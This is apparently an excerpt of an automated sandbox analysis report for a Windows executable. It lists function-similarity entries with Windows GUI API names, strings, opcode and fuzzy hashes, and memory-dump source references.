                                                                            • API ID: Object$Select$CreateEllipse$CompatibleHashRect$BitmapBrushDeleteImplImpl::InflateOffsetRectangleSolidStock
                                                                            • String ID:
                                                                            • API String ID: 3053867852-3916222277
                                                                            • Opcode ID: 41a9a0f86e7679696dd18d34951ead7d5c7f10c4feddc00e758b6f12322b91c4
                                                                            • Instruction ID: 6d72cbe629fbee27e46a4bb661315642e0698a66fcbb781c79e130a2c308d2cf
                                                                            • Opcode Fuzzy Hash: 41a9a0f86e7679696dd18d34951ead7d5c7f10c4feddc00e758b6f12322b91c4
                                                                            • Instruction Fuzzy Hash: 4642C836A10A908AE712DF7AD4057AD77B4FB597D8F008316EF4AA7B65DB38D842C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Hash$Create$CompatibleImplImpl::$Bitmap$DeleteStretchTransparent
                                                                            • String ID: $
                                                                            • API String ID: 3547714547-227171996
                                                                            • Opcode ID: 282ab98834eb7c554d698cc89adb70fda8970aff68e4d2f5b003cd5c379e578f
                                                                            • Instruction ID: 5e20ca15cc98591caced316c9573e667a99a365e7595180964947c63d88c44cf
                                                                            • Opcode Fuzzy Hash: 282ab98834eb7c554d698cc89adb70fda8970aff68e4d2f5b003cd5c379e578f
                                                                            • Instruction Fuzzy Hash: 79B14B76714A808AE721DF66E4807DE77B1F398798F100225AF8E57BB8DB38C545CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Message$Send$Beep
                                                                            • String ID:
                                                                            • API String ID: 877464050-0
                                                                            • Opcode ID: 161481fb31babc6bd9914bcfb27d5817e7c0f4a7692d254da4a467f4a5f87bde
                                                                            • Instruction ID: 3481fd8127dfe0a695de812ff794c2137596a33527cb117cddbedf97fa8afc5c
                                                                            • Opcode Fuzzy Hash: 161481fb31babc6bd9914bcfb27d5817e7c0f4a7692d254da4a467f4a5f87bde
                                                                            • Instruction Fuzzy Hash: D112DF72700A5086EB26DB66D854BEE23A2F74CBC8F200912EF1E57BA5DF38D945C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Rect$SystemWindow$InfoMetricsMonitor$ClientCopyCursorFromMessageParametersPointSendTheme
                                                                            • String ID: 3
                                                                            • API String ID: 381205858-1842515611
                                                                            • Opcode ID: 847bb6644997e3cba79a60948d2b593250b0f05c51d357fee4ffe0bade6e9487
                                                                            • Instruction ID: 9dfa2018b1c504905c31ae1a8447e0a3b1e8459d304cb42b45104b3ba001b9ed
                                                                            • Opcode Fuzzy Hash: 847bb6644997e3cba79a60948d2b593250b0f05c51d357fee4ffe0bade6e9487
                                                                            • Instruction Fuzzy Hash: C2D19772600B908BEB11CB6AE8887DD33A5F78CB98F554226DF4D57BA4DB78C841CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Rect$OffsetWindow$ClientCreateEmptyIndirectVisible
                                                                            • String ID: 2
                                                                            • API String ID: 398194487-450215437
                                                                            • Opcode ID: c6154c0d9d427c9ae4c3ece4907c0215b3eedc5a210a88e820b8fffa993d6729
                                                                            • Instruction ID: fdfc20634623b5ca35e2747f9b68cf4a6b2e32347a290bf542755ca34dfde4a5
                                                                            • Opcode Fuzzy Hash: c6154c0d9d427c9ae4c3ece4907c0215b3eedc5a210a88e820b8fffa993d6729
                                                                            • Instruction Fuzzy Hash: 77628D32600B8185EB22DF7AD8407ED6361F789BE8F445216EF5967BA9EF34C944C780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Message$Capture$Window$Dispatch$PeekRectRedrawReleaseScroll
                                                                            • String ID:
                                                                            • API String ID: 1873598099-0
                                                                            • Opcode ID: 8aa9477636bff577f2c98f28b5843f1c3e2af85a127e6c478c5069c94bd966b3
                                                                            • Instruction ID: 1ebc416a63cfc6b69e71ffc10b2aa332aac407b7350a40ad987e63837d02d555
                                                                            • Opcode Fuzzy Hash: 8aa9477636bff577f2c98f28b5843f1c3e2af85a127e6c478c5069c94bd966b3
                                                                            • Instruction Fuzzy Hash: 5DC15B363046408AEB2ADF67E4547EE67A1FB8DBC4F084126EB5A47BA9CF38D445C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Parent$MessageSend$CharExceptionInvalidateRectThrowUpdateUpperWindowwcschr
                                                                            • String ID: MenuBar
                                                                            • API String ID: 3755686937-731504628
                                                                            • Opcode ID: f3d56c2a86e3bee20ff0dc0bf83195bf3b45a895261da4294fdd102e1bbdffe1
                                                                            • Instruction ID: 69b37cbfccaf6cbb4eaa717013bba13037639fd086781866892e6dab312b1280
                                                                            • Opcode Fuzzy Hash: f3d56c2a86e3bee20ff0dc0bf83195bf3b45a895261da4294fdd102e1bbdffe1
                                                                            • Instruction Fuzzy Hash: E0B14A35300B4582EA2ADB67E4557EA63A0FB8DFC4F084125DF9A4BBA6DF79D441C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Rect$InvalidateKillTimer$ClientCursorRedrawScreenValidateWindow
                                                                            • String ID: _
                                                                            • API String ID: 1459077570-701932520
                                                                            • Opcode ID: 05cb1e4b945e8c441b8cf659f9aec8adb3d204be3092ac8448fe50b654a8c4f1
                                                                            • Instruction ID: b526aa750178a9b15378db31d6aa83abc6a7b1d0bc5516c7d8b49fa6b841f0e2
                                                                            • Opcode Fuzzy Hash: 05cb1e4b945e8c441b8cf659f9aec8adb3d204be3092ac8448fe50b654a8c4f1
                                                                            • Instruction Fuzzy Hash: 7F914C7660878097EA1DDF27E9547ED77A1F789BC0F084126EB4A83AA1CF39D461CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Message$CaptureCursorSend$LoadPeekPostRelease$Wait
                                                                            • String ID:
                                                                            • API String ID: 2899155438-0
                                                                            • Opcode ID: 455c610cc485f8c5aa4e9b9fb6a84c9cddfc3fd87a10ae0bbfce77d00b1b3282
                                                                            • Instruction ID: f916bf15c452c35369b46352a224050d124869ad1a485103e75cc7d47ebb09c5
                                                                            • Opcode Fuzzy Hash: 455c610cc485f8c5aa4e9b9fb6a84c9cddfc3fd87a10ae0bbfce77d00b1b3282
                                                                            • Instruction Fuzzy Hash: 9D617F3630468082F766DB6BE544BEB67A1FB9CF84F044025DF9A47BA5DE79C481CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: wcsstr$FileModuleName
                                                                            • String ID:
                                                                            • API String ID: 4197323741-0
                                                                            • Opcode ID: 8ffe74e06465c8f11655523048f02a8e1f9259899c663286b95a2dcdc82d2a73
                                                                            • Instruction ID: 6e57b712ccdf50806e327be3cbe3f68763cc71b9adcf24eb0828ab0ccb52159c
                                                                            • Opcode Fuzzy Hash: 8ffe74e06465c8f11655523048f02a8e1f9259899c663286b95a2dcdc82d2a73
                                                                            • Instruction Fuzzy Hash: 49B19D36304B8086EB26DB26E9507DE73A1F788BE4F841125EF9A47BA5DF78C645C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Rect$Text$InflateWindow$DrawIconLengthMetricsOffset
                                                                            • String ID: $$UUUU
                                                                            • API String ID: 1344069868-1406628070
                                                                            • Opcode ID: c8423ba659b5cd69e830d85ccf0981591d17ff1d4224a7c24a290224df244533
                                                                            • Instruction ID: b6eba8df1219889ee2d3177986fef3a758d5c185399020238a15ed904ffa4219
                                                                            • Opcode Fuzzy Hash: c8423ba659b5cd69e830d85ccf0981591d17ff1d4224a7c24a290224df244533
                                                                            • Instruction Fuzzy Hash: 09129C36B20A908AEB16CF7AD8447ED73A1F78CB94F484225DF4957BA5DB78D910CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Resource$Find$AllocDefaultEnumFamiliesFontGlobalHandleLanguageLoadModuleReleaseUser
                                                                            • String ID: MS UI Gothic$comctl32.dll
                                                                            • API String ID: 1606157363-3248924666
                                                                            • Opcode ID: 2cfcb80d8f4fbae5debcd64d1f87cbb271c18279e5df8ce7563de3ba8ce1dc41
                                                                            • Instruction ID: c74af288cf3ee4a1370cbd887888ae7781fc1503b1c37d1759b453f0abdb9465
                                                                            • Opcode Fuzzy Hash: 2cfcb80d8f4fbae5debcd64d1f87cbb271c18279e5df8ce7563de3ba8ce1dc41
                                                                            • Instruction Fuzzy Hash: 1651A07570164542FA2BEB6794447F96391EB4DBC0F548C24AF499BBF1EE38C942C300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Rect$InfoMonitorOffsetWindow$AttributesCopyCursorEmptyFromLayeredLoadParametersPointShowSystem
                                                                            • String ID:
                                                                            • API String ID: 264503638-0
                                                                            • Opcode ID: dce7f88ef741544c4c9d67f35e2c56864266f033f4e595000d6e10da0c9dc876
                                                                            • Instruction ID: 7ed77f168fd17e292b3f0251d98b6f67869e58d0a54a5e6c72a95767aa8c6930
                                                                            • Opcode Fuzzy Hash: dce7f88ef741544c4c9d67f35e2c56864266f033f4e595000d6e10da0c9dc876
                                                                            • Instruction Fuzzy Hash: 06916C36710A809AFB12EB67D4547ED23A1FB8CB94F448126EF0A57BA5DF38C945C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Gdip$Image$BitmapBits$ColorHeightLockPaletteTableUnlockWidth
                                                                            • String ID: &
                                                                            • API String ID: 603721357-3042966939
                                                                            • Opcode ID: 72520d758f942a503d2819024fc85e6ce2ae128253b91d3ccfb408e97973d2c1
                                                                            • Instruction ID: 3ee80e08199bbfa779cd1ddd78611eee196e197e55dc7482721ab755957adea3
                                                                            • Opcode Fuzzy Hash: 72520d758f942a503d2819024fc85e6ce2ae128253b91d3ccfb408e97973d2c1
                                                                            • Instruction Fuzzy Hash: 48A19C73210A818BEB62DF27D8407DA37A4F758BD8F004526EF1A4BBA9DB74D605CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            Similarity
                                                                            • API ID: std::ios_base::~ios_base$ExceptionParentRectThrow$EmptyWindow_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2711201615-0
                                                                            • Opcode ID: 09ec593d255c5a159ca69f8169326a33d91a88d24d0c2bffb43374e3cab98bd2
                                                                            • Instruction ID: cae3bd18125fa3acf9cdae65962db140a898e8841669724c0c8d5aece1360557
                                                                            • Opcode Fuzzy Hash: 09ec593d255c5a159ca69f8169326a33d91a88d24d0c2bffb43374e3cab98bd2
                                                                            • Instruction Fuzzy Hash: 4CD25D32210A4486EA66EB27D5A57EE6361FB8DBC4F445029EF4F47BB2DE78E441D300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Parent$Rect$Empty$Window
                                                                            • String ID:
                                                                            • API String ID: 1870126367-0
                                                                            • Opcode ID: 5ba22e782a801eccfd3501afd96798e699f51748e0029cbf430a77bd7eafc071
                                                                            • Instruction ID: ca1156d6a2a226f9de1d7bfbba8c58ea67a294a24e09bcc63e175c3b8162e121
                                                                            • Opcode Fuzzy Hash: 5ba22e782a801eccfd3501afd96798e699f51748e0029cbf430a77bd7eafc071
                                                                            • Instruction Fuzzy Hash: 05C10436714A9085EB05EBA7E8907ED27A0BB8DFC4F095026DF0E97B66DE39C441C704
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Window$LockRectUpdate$Copy
                                                                            • String ID: 6
                                                                            • API String ID: 2992910783-498629140
                                                                            • Opcode ID: 652a8301efe8cdd8df316e96a0fe1c9df0e04a397a379a47af6c6642e83b352a
                                                                            • Instruction ID: 783501a4e73ab3c1924acf5550ab67273782ed861fa34d4805c1dcfc66db961f
                                                                            • Opcode Fuzzy Hash: 652a8301efe8cdd8df316e96a0fe1c9df0e04a397a379a47af6c6642e83b352a
                                                                            • Instruction Fuzzy Hash: 0DA19E3671068186EB05DBA7D8947ED27A1BB8CFC8F499526DF0A67B65DF38C401CB04
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Menu$Long$ClassMessageSendSystemWindow
                                                                            • String ID:
                                                                            • API String ID: 2993048677-0
                                                                            • Opcode ID: 5845efb493f626df1cf0549473e59315d0ad35be4aa24ceaa7189a38b154f427
                                                                            • Instruction ID: e15764b0db0e03e835221e5a581c7aafa023a6447e80fef72c8dba48731ab533
                                                                            • Opcode Fuzzy Hash: 5845efb493f626df1cf0549473e59315d0ad35be4aa24ceaa7189a38b154f427
                                                                            • Instruction Fuzzy Hash: 1FA18F3621468086EB65DB27E4543EE6361F78EF94F484225EF6A4BBE1DF39C541C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Window$Redraw$ClientScreen$RectTimer
                                                                            • String ID: /
                                                                            • API String ID: 26607385-2043925204
                                                                            • Opcode ID: 0a3b29e73952d5148bf47d219ca2eb51ce00bd341fc387a26e140244e797ba29
                                                                            • Instruction ID: 4d401808a4655bfbabc02a52809821df50b78c344914ebb37e2a02e4ff5d92e7
                                                                            • Opcode Fuzzy Hash: 0a3b29e73952d5148bf47d219ca2eb51ce00bd341fc387a26e140244e797ba29
                                                                            • Instruction Fuzzy Hash: 67913D3631568086EA16EB67E5547ED6361BB8DFC0F485021EF0A4BBA6DF39C511C704
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: MessageSend$IconLoad$ClassExceptionLongThrow
                                                                            • String ID:
                                                                            • API String ID: 1634575180-0
                                                                            • Opcode ID: bda70c2ce5368a83901fc2a74ebea089a940846b70b56b564ea54febd301bbc5
                                                                            • Instruction ID: 0b76840bcca805542515d74292dcd280e11a407298cde9f1598baf9387dc3697
                                                                            • Opcode Fuzzy Hash: bda70c2ce5368a83901fc2a74ebea089a940846b70b56b564ea54febd301bbc5
                                                                            • Instruction Fuzzy Hash: E6516E35300B8086EB66EB63E9947EE27A1EB8DFC4F4855219F5E47BA6DE38D441C301
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Window$Redraw$Visible
                                                                            • String ID:
                                                                            • API String ID: 1637130220-0
                                                                            • Opcode ID: 409fe66dd77c07c7b7f765cca77378ce19a3d9dc0158cc62bb3bc341edeeadff
                                                                            • Instruction ID: 9ba695fd84e26366babb64907a32b19d68e20b9f8e94b10e1ebdb90aed8bd6e8
                                                                            • Opcode Fuzzy Hash: 409fe66dd77c07c7b7f765cca77378ce19a3d9dc0158cc62bb3bc341edeeadff
                                                                            • Instruction Fuzzy Hash: 3F512A36714A4482FA66DF27E8947EA73A0FB8CFC4F145025DF4A8B6B0DE79C5068744
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Rect$Client$ConditionHashIntersectMask$EmptyImplImpl::InflateInfoLongMetricsSystemVerifyVersionWindow
                                                                            • String ID:
                                                                            • API String ID: 4129552557-0
                                                                            • Opcode ID: e747a61e9c0731c67c822f5b42d6cabd4835da2cd403239e1808dae041b1afa0
                                                                            • Instruction ID: 02ec1eecf3b28572dd6deb6ce9c3c26d1e6ff52faeab7eda545a5e34d8ccd1d5
                                                                            • Opcode Fuzzy Hash: e747a61e9c0731c67c822f5b42d6cabd4835da2cd403239e1808dae041b1afa0
                                                                            • Instruction Fuzzy Hash: 0D52BC32624A9586EB12DB67E444BED73A4FB8DBC8F458216EF0957BB5DB78C840C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryExceptionMenuThrow__report_securityfailure_cwprintf_s_lstd::ios_base::~ios_base
                                                                            • String ID: &%d %Ts$Recent File
                                                                            • API String ID: 4135784057-993655659
                                                                            • Opcode ID: 355f372e7fa2f6aa233080dd4b98b2fb6dce10f53e64cb44d46bf2d7fc4a526a
                                                                            • Instruction ID: 2e64aed256bbb5a07120bbe0d21b2bdb6608cefac2cef0188d5fc0116dd88002
                                                                            • Opcode Fuzzy Hash: 355f372e7fa2f6aa233080dd4b98b2fb6dce10f53e64cb44d46bf2d7fc4a526a
                                                                            • Instruction Fuzzy Hash: 6D127C36218B8186EA5ADF67D4943EE63A0F78DBD4F494126EF5947BA6DF38C801C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: FindPath$CharCloseExceptionFileFirstFullInformationNameThrowUpperVolume
                                                                            • String ID:
                                                                            • API String ID: 2923705660-0
                                                                            • Opcode ID: a085fa28f57ec527c8c96ab7cd16f4eec7f2f3044cc184721b1f7643e3a6735e
                                                                            • Instruction ID: 430b533cce07087ab279d7e930388c5030057c858d2d547ba3f0f0793df7da52
                                                                            • Opcode Fuzzy Hash: a085fa28f57ec527c8c96ab7cd16f4eec7f2f3044cc184721b1f7643e3a6735e
                                                                            • Instruction Fuzzy Hash: 8581B171210A4041FA27AB2BA455BEF6390AB8DBE4F544A11FF6987BF5DF38C851C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: MessageSend$Parent$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 4191550487-0
                                                                            • Opcode ID: 0951ddaa1630b794e425368f44b63be50515e7ab2b2bc185e36350806b7c4ad6
                                                                            • Instruction ID: f9cd7551443dacc0560127e61de9704e38d3244a5eb463cbfd8f8edefdf3a124
                                                                            • Opcode Fuzzy Hash: 0951ddaa1630b794e425368f44b63be50515e7ab2b2bc185e36350806b7c4ad6
                                                                            • Instruction Fuzzy Hash: 6531C136B40A4092FB6A9B27F458BDE6760F78DF94F541021DF4A07BA6CF79C4908780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                            • String ID:
                                                                            • API String ID: 1239891234-0
                                                                            • Opcode ID: 996539c13bf56de6fff70cc47f328bc9d814000f53a173e515cb7ec8e31f5b4b
                                                                            • Instruction ID: a544c38855a6908e0c7bcf386b667b2c9e8f38dfa1ec4b25b4e08dd131a45271
                                                                            • Opcode Fuzzy Hash: 996539c13bf56de6fff70cc47f328bc9d814000f53a173e515cb7ec8e31f5b4b
                                                                            • Instruction Fuzzy Hash: 54319F36214B8186EB61CF26E8447DE33A4F788B58F54012AEB9D47BA8DF38C546CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParentWindowstd::ios_base::~ios_base
                                                                            • String ID:
                                                                            • API String ID: 3887031883-0
                                                                            • Opcode ID: 7cfb668fa1a89feb959b52328b2ac2b6c596761aa6dc740b9b283891b68f05ff
                                                                            • Instruction ID: d474cb4dc8cdb04678e2239305b384f8ee8e8ebb8686284264462acc162c7b1a
                                                                            • Opcode Fuzzy Hash: 7cfb668fa1a89feb959b52328b2ac2b6c596761aa6dc740b9b283891b68f05ff
                                                                            • Instruction Fuzzy Hash: B6524B36600A4087EA66EB27D8953EE63A1F789BC4F444515EF8E47BB6DF38E841C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$ParentRedraw
                                                                            • String ID:
                                                                            • API String ID: 3493001960-0
                                                                            • Opcode ID: 9575dd3d1a55c1d9dc4051e2730fa2d99d7eb429e5d93d6c34a5483677be9026
                                                                            • Instruction ID: aa84f0df66b489b9ab9d0d5132db7110ad1b08fb615910550d34eed50c83f706
                                                                            • Opcode Fuzzy Hash: 9575dd3d1a55c1d9dc4051e2730fa2d99d7eb429e5d93d6c34a5483677be9026
                                                                            • Instruction Fuzzy Hash: 27A13B36704A9286EE16EFA798547EA63A1BB8DFC4F098436DF0E477A1DE79C441C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: RectWindow$CursorLoad
                                                                            • String ID:
                                                                            • API String ID: 3444235573-0
                                                                            • Opcode ID: 29375ded6e8925bd073ffb9992306f624188040a540ba8e1c401448822a0c7d5
                                                                            • Instruction ID: 58489b30925c868ccb3a5454988bb159249b18a948cc87e681390866717db4a7
                                                                            • Opcode Fuzzy Hash: 29375ded6e8925bd073ffb9992306f624188040a540ba8e1c401448822a0c7d5
                                                                            • Instruction Fuzzy Hash: 4FC15B32600AC086EB26DF76E8647DE6760FB8DB84F444126EB9E47BA6DF78D541C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Rect$AsyncEmptyState$Invert
                                                                            • String ID: (
                                                                            • API String ID: 613991215-3887548279
                                                                            • Opcode ID: ce6d6b1d5365356a31f2358a4443b04d6871da755c3c512ab86d658224c143a9
                                                                            • Instruction ID: 730a8590baf601da818039969f3e5b4258ba5727b9f07f92cde639826a362630
                                                                            • Opcode Fuzzy Hash: ce6d6b1d5365356a31f2358a4443b04d6871da755c3c512ab86d658224c143a9
                                                                            • Instruction Fuzzy Hash: 0612817630168086EA7ADB2B89547ED23A2F78CBC4F285A26EF1D477A5CF35C851C701
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • _Init_thread_footer.LIBCMT ref: 000000014000E5AB
                                                                              • Part of subcall function 00000001401CB79C: EnterCriticalSection.KERNEL32(?,?,?,000000014000BDAD,?,?,?,000000014000C09E), ref: 00000001401CB7AC
                                                                              • Part of subcall function 00000001401CB79C: LeaveCriticalSection.KERNEL32(?,?,?,000000014000BDAD,?,?,?,000000014000C09E), ref: 00000001401CB7EC
                                                                            • GetProcessHeap.KERNEL32(?,?,TGenericSinkCoupler<class _com_ptr_t<class _com_IIID<struct ISBActiveProtection,&struct __s_GUID const _GUID_f4198087_be24_4537_98,0000000140200C3E), ref: 000000014000E576
                                                                            • _Init_thread_footer.LIBCMT ref: 000000014000E625
                                                                              • Part of subcall function 00000001401CB7FC: EnterCriticalSection.KERNEL32(?,?,?,000000014000BD8D,?,?,?,000000014000C09E), ref: 00000001401CB80C
                                                                            Strings
                                                                            • TGenericSinkCoupler<class _com_ptr_t<class _com_IIID<struct ISBActiveProtection,&struct __s_GUID const _GUID_f4198087_be24_4537_98, xrefs: 000000014000E540
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterInit_thread_footer$HeapLeaveProcess_onexit
                                                                            • String ID: TGenericSinkCoupler<class _com_ptr_t<class _com_IIID<struct ISBActiveProtection,&struct __s_GUID const _GUID_f4198087_be24_4537_98
                                                                            • API String ID: 3925148313-102460630
                                                                            • Opcode ID: 04d8fea5d159e5dad9b7f48ca5b4d035eec76ef149ae2b86b9fa2a505ee60cf2
                                                                            • Instruction ID: e07cadb934fc0c54caa70eb6b15e5ffc53d746895e1dec330639480a33609098
                                                                            • Opcode Fuzzy Hash: 04d8fea5d159e5dad9b7f48ca5b4d035eec76ef149ae2b86b9fa2a505ee60cf2
                                                                            • Instruction Fuzzy Hash: 7B21ED70661B4495FB06DFA2FC89BD633A8B79C766F601125D72C422F1DBB8C946C780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Rect$Window$EmptyState
                                                                            • String ID:
                                                                            • API String ID: 1580063985-0
                                                                            • Opcode ID: 0504ccfc04e666f185dd8aa1d20d06c6b770a0160e6858b1f43ee8b5b62ad330
                                                                            • Instruction ID: 0681e4aa45c887c2f43826025ba3ae9a0bb0e0cd54f519ae2df73e92caeb7e4b
                                                                            • Opcode Fuzzy Hash: 0504ccfc04e666f185dd8aa1d20d06c6b770a0160e6858b1f43ee8b5b62ad330
                                                                            • Instruction Fuzzy Hash: 07C11436704B8186EB1ADFA7A4943ED23A5BB4CFC4F098126DF495BB69DE38C516C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: FillRect$BrushCreateSolid
                                                                            • String ID:
                                                                            • API String ID: 248659410-0
                                                                            • Opcode ID: 1a397a4f17b8dadbfbcac12e856593f5b7f75613517bfebb3d79db9e418647d0
                                                                            • Instruction ID: 9730473f39cf2b2fffa05b929faecbe20d300f53129a39c6cad425ad532a46bd
                                                                            • Opcode Fuzzy Hash: 1a397a4f17b8dadbfbcac12e856593f5b7f75613517bfebb3d79db9e418647d0
                                                                            • Instruction Fuzzy Hash: 90916D72B205518AE708DF7AC9557EC6BB5F388388F54912DEF0A9BBA4DB38C585C340
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientEnableExceptionItemMessagePointsRectSendThrowwcschr
                                                                            • String ID:
                                                                            • API String ID: 1851896112-0
                                                                            • Opcode ID: 0b32fe3e28013d55605071da2486921fd7d90f90c8f0e913cba82441660e1e81
                                                                            • Instruction ID: a9e3f5588e9da3408df58008dec949ba3464fb2607e6714e7de3170b6ee19d47
                                                                            • Opcode Fuzzy Hash: 0b32fe3e28013d55605071da2486921fd7d90f90c8f0e913cba82441660e1e81
                                                                            • Instruction Fuzzy Hash: 63A15D35701AC489EB66EF27D4553ED2391BB89BD4F898422AF490BBBADF38C541C740
                                                                            Uniqueness

